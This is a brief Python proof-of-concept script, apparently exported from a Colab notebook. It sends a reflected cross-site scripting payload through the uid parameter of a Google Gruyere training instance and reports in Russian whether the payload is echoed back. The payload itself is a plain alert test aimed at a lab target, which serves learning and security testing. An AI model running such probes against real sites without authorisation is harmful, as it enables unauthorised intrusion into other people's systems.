# -*- coding: utf-8 -*-
"""poc.ipynb

Automatically generated by Colab.

Original file is located at
    https://colab.research.google.com/drive/1OOIQwMJQMqHgsCC6BgGkeIL2YQ-PwyZu
"""

import requests
from urllib.parse import quote

payload = "<script>alert('XSS')</script>"

GRUYERE_ID = "417579647773686136932986944904974872986"
url = f"http://google-gruyere.appspot.com/{GRUYERE_ID}/feed.gtl?uid={quote(payload)}"

r = requests.get(url)

if payload in r.text:
    print("[+] Потенциальная уязвимость обнаружена")
else:
    print("[-] XSS не обнаружена")